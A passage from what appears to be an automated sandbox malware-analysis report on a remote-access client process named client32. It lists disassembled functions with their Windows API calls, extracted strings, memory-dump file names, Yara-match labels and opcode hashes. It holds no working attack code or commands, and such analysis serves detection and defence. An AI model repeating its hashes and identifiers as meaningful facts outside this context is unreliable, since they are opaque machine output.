6f9f9a9a 2874->2876 2877 6f9f9a67-6f9f9a6a 2874->2877 2875->2874 2876->2869 2878 6f9f9a6e-6f9f9a85 2877->2878 2879 6f9f9a6c 2877->2879 2878->2846 2880 6f9f9a8b 2878->2880 2879->2878 2880->2853
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strncmp
                                                                                  • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                  • API String ID: 909875538-2848211065
                                                                                  • Opcode ID: 46c56d4116edf4e34ee621750845c7a309e160f0843e52fe74b7f83b33708654
                                                                                  • Instruction ID: 86cbfce4d3bcf3f728a0d43727a0faea78ed61e42a93a488509f18b3f9110653
                                                                                  • Opcode Fuzzy Hash: 46c56d4116edf4e34ee621750845c7a309e160f0843e52fe74b7f83b33708654
                                                                                  • Instruction Fuzzy Hash: 49D1D671E052199FDB20CF68CC81BD9B7B9AF1A318F0481DAD80D9B285D735E986CF51
                                                                                  Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2881 11028c10-11028c2d 2882 11028c33-11028c62 2881->2882 2883 110292f8-110292ff 2881->2883 2884 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2882->2884 2885 11028c68-11028c6e 2882->2885 2886 11029311-11029315 2883->2886 2887 11029301-1102930a 2883->2887 2901 11028d3d 2884->2901 2888 11028c70-11028c78 2885->2888 2890 11029317-11029329 call 11162bb7 2886->2890 2891 1102932a-1102933e call 11162bb7 2886->2891 2887->2886 2889 1102930c 2887->2889 2888->2888 2893 11028c7a-11028c80 2888->2893 2889->2886 2898 11028c83-11028c88 2893->2898 2898->2898 2902 11028c8a-11028c94 2898->2902 2903 11028d40-11028d4a 2901->2903 2904 11028cb1-11028cb7 2902->2904 2905 11028c96-11028c9d 2902->2905 2906 11028d50-11028d53 2903->2906 2907 110292ef-110292f7 2903->2907 2909 11028cb8-11028cbe 2904->2909 2908 11028ca0-11028ca6 2905->2908 2906->2907 2910 11028d59-11028d67 call 11026ef0 2906->2910 2907->2883 2908->2908 2911 11028ca8-11028cae 2908->2911 2909->2909 2912 11028cc0-11028cee call 11164ead 2909->2912 2917 11029275-1102928a call 11164c77 2910->2917 2918 11028d6d-11028d80 call 11163ca7 2910->2918 2911->2904 2912->2903 2917->2907 2923 11029290-110292ea 2917->2923 2924 11028d82-11028d85 2918->2924 2925 11028d8b-11028db3 call 11026d60 call 11026ef0 2918->2925 2923->2907 2924->2917 2924->2925 2925->2917 2930 11028db9-11028dd6 call 11026fe0 call 11026ef0 2925->2930 2935 110291e5-110291ec 2930->2935 2936 11028ddc 2930->2936 2937 11029212-11029219 2935->2937 2938 110291ee-110291f1 2935->2938 2939 11028de0-11028e00 call 11026d60 2936->2939 2941 11029231-11029238 2937->2941 2942 1102921b-11029221 2937->2942 2938->2937 2940 110291f3-110291fa 2938->2940 2949 11028e02-11028e05 2939->2949 2950 11028e36-11028e39 2939->2950 2944 11029200-11029210 2940->2944 2946 1102923a-11029245 2941->2946 2947 11029248-1102924f 2941->2947 2945 11029227-1102922f 2942->2945 2944->2937 2944->2944 2945->2941 2945->2945 2946->2947 2951 11029251-1102925b 2947->2951 2952 1102925e-11029265 2947->2952 2953 11028e07-11028e0e 2949->2953 2954 11028e1e-11028e21 2949->2954 2956 110291ce-110291df call 11026ef0 2950->2956 2957 11028e3f-11028e52 call 11165010 2950->2957 2951->2952 2952->2917 2955 11029267-11029272 2952->2955 2959 11028e14-11028e1c 2953->2959 2954->2956 2960 11028e27-11028e31 2954->2960 2955->2917 2956->2935 2956->2939 2957->2956 2964 11028e58-11028e74 call 1116558e 2957->2964 2959->2954 2959->2959 2960->2956 2967 11028e76-11028e7c 2964->2967 2968 11028e8f-11028ea5 call 1116558e 2964->2968 2969 11028e80-11028e88 2967->2969 2973 11028ea7-11028ead 2968->2973 2974 11028ebf-11028ed5 call 1116558e 2968->2974 2969->2969 2971 11028e8a 2969->2971 2971->2956 2975 11028eb0-11028eb8 2973->2975 2979 11028ed7-11028edd 2974->2979 2980 11028eef-11028f05 call 1116558e 2974->2980 2975->2975 2978 11028eba 2975->2978 2978->2956 2981 11028ee0-11028ee8 2979->2981 2985 11028f07-11028f0d 2980->2985 2986 11028f1f-11028f35 call 1116558e 2980->2986 2981->2981 2983 11028eea 2981->2983 2983->2956 2987 11028f10-11028f18 2985->2987 2991 11028f37-11028f3d 2986->2991 2992 11028f4f-11028f65 call 1116558e 2986->2992 2987->2987 2989 11028f1a 2987->2989 2989->2956 2994 11028f40-11028f48 2991->2994 2997 11028f67-11028f6d 2992->2997 2998 11028f7f-11028f95 call 1116558e 2992->2998 2994->2994 2996 11028f4a 2994->2996 2996->2956 2999 11028f70-11028f78 2997->2999 3003 11028f97-11028f9d 2998->3003 3004 11028faf-11028fc5 call 1116558e 2998->3004 2999->2999 3001 11028f7a 2999->3001 3001->2956 3005 11028fa0-11028fa8 3003->3005 3009 11028fc7-11028fcd 3004->3009 3010 11028fdf-11028ff5 call 1116558e 3004->3010 3005->3005 3007 11028faa 3005->3007 3007->2956 3011 11028fd0-11028fd8 3009->3011 3015 11028ff7-11028ffd 3010->3015 3016 1102900f-11029025 call 1116558e 3010->3016 3011->3011 3013 11028fda 3011->3013 3013->2956 3017 11029000-11029008 3015->3017 3021 11029027-1102902d 3016->3021 3022 1102903f-11029055 call 1116558e 3016->3022 3017->3017 3019 1102900a 3017->3019 3019->2956 3023 11029030-11029038 3021->3023 3027 11029057-1102905d 3022->3027 3028 1102906f-11029085 call 1116558e 3022->3028 3023->3023 3026 1102903a 3023->3026 3026->2956 3029 11029060-11029068 3027->3029 3033 110290a6-110290bc call 1116558e 3028->3033 3034 11029087-1102908d 3028->3034 3029->3029 3031 1102906a 3029->3031 3031->2956 3039 110290d3-110290e9 call 1116558e 3033->3039 3040 110290be 3033->3040 3035 11029097-1102909f 3034->3035 3035->3035 3037 110290a1 3035->3037 3037->2956 3045 11029100-11029116 call 1116558e 3039->3045 3046 110290eb 3039->3046 3042 110290c4-110290cc 3040->3042 3042->3042 3044 110290ce 3042->3044 3044->2956 3051 11029137-1102914d call 1116558e 3045->3051 3052 11029118-1102911e 3045->3052 3047 110290f1-110290f9 3046->3047 3047->3047 3049 110290fb 3047->3049 3049->2956 3057 1102916f-11029185 call 1116558e 3051->3057 3058 1102914f-1102915f 3051->3058 3053 11029128-11029130 3052->3053 3053->3053 3055 11029132 3053->3055 3055->2956 3063 11029187-1102918d 3057->3063 3064 1102919c-110291b2 call 1116558e 3057->3064 3059 11029160-11029168 3058->3059 3059->3059 3061 1102916a 3059->3061 3061->2956 3065 11029190-11029198 3063->3065 3064->2956 3069 110291b4-110291ba 3064->3069 3065->3065 3067 1102919a 3065->3067 3067->2956 3070 110291c4-110291cc 3069->3070 3070->2956 3070->3070
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73F51370,?,0000001A), ref: 11028CFD
                                                                                  • _strrchr.LIBCMT ref: 11028D0C
                                                                                    • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileModuleName__stricmp_l_strrchr
                                                                                  • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                  • API String ID: 1609618855-357498123
                                                                                  • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                  • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                  • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                  • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                  Function 6FA06BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06BD5
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06C26
                                                                                  • Sleep.KERNEL32(00000064), ref: 6FA06C5B
                                                                                    • Part of subcall function 6FA06940: GetTickCount.KERNEL32 ref: 6FA06950
                                                                                  • WaitForSingleObject.KERNEL32(000002E8,?), ref: 6FA06C7C
                                                                                  • _memmove.LIBCMT ref: 6FA06C93
                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6FA06CB4
                                                                                  • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6FA06CD9
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06CEC
                                                                                  • _calloc.LIBCMT ref: 6FA06D76
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06DF3
                                                                                  • InterlockedExchange.KERNEL32(03022FE2,00000000), ref: 6FA06E01
                                                                                  • _calloc.LIBCMT ref: 6FA06E33
                                                                                  • _memmove.LIBCMT ref: 6FA06E47
                                                                                  • InterlockedDecrement.KERNEL32(03022F8A), ref: 6FA06EC3
                                                                                  • SetEvent.KERNEL32(000002EC), ref: 6FA06ECF
                                                                                  • _memmove.LIBCMT ref: 6FA06EF4
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06F4F
                                                                                  • InterlockedExchange.KERNEL32(03022F2A,-6FA3A188), ref: 6FA06F60
                                                                                  Strings
                                                                                  • ReadMessage returned FALSE. Terminating connection, xrefs: 6FA06F3A
                                                                                  • httprecv, xrefs: 6FA06BDD
                                                                                  • ProcessMessage returned FALSE. Terminating connection, xrefs: 6FA06F25
                                                                                  • ResumeTimeout, xrefs: 6FA06BBA
                                                                                  • FALSE, xrefs: 6FA06E67
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6FA06E62
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                  • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                  • API String ID: 1449423504-919941520
                                                                                  • Opcode ID: 76397750fdb577a37c5ad635268b8b29929ec82147da63a841a48431eba31dfd
                                                                                  • Instruction ID: 78fa0b8020ebdf2d59f63a49e052932926e585954efdd68a6bb47c3fe53fe5d8
                                                                                  • Opcode Fuzzy Hash: 76397750fdb577a37c5ad635268b8b29929ec82147da63a841a48431eba31dfd
                                                                                  • Instruction Fuzzy Hash: ADB1C672D007689BDB20DF24ED44BD973B4AF4635CF048196E549E6380D7B8AAC5CFA1
                                                                                  Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                  • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                    • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                  • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                  • InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                    • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                  • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                  • API String ID: 1620732580-3468083601
                                                                                  • Opcode ID: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
                                                                                  • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                  • Opcode Fuzzy Hash: a52245c749e75159c2902df304c492d0e9983b19c11134f1a5543dcd53e797c4
                                                                                  • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                                  Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                                  • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                  • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                  • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                  • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                  • API String ID: 2201880244-3035937465
                                                                                  • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                  • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                  • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                  • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                  Function 11142400 Relevance: 37.4, APIs: 3, Strings: 18, Instructions: 677registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 3535843008-1834795898
                                                                                  • Opcode ID: b7abf8d5a424bbc22ea41f3e9cbdc2ec6edd7b0dc9b215707fdcc33a6958c365
                                                                                  • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                  • Opcode Fuzzy Hash: b7abf8d5a424bbc22ea41f3e9cbdc2ec6edd7b0dc9b215707fdcc33a6958c365
                                                                                  • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                                  Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                  • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                  • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                  • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                  • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                  • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                  • _strncpy.LIBCMT ref: 11074E38
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                  • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                                  • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                  • std::exception::exception.LIBCMT ref: 11075038
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                  • API String ID: 703120326-1497550179
                                                                                  • Opcode ID: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
                                                                                  • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                  • Opcode Fuzzy Hash: 4c4de70eae27fa00bb3819321964e2a7d1f65d6f17cf2c5ba64a3656b5ffd917
                                                                                  • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                  Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
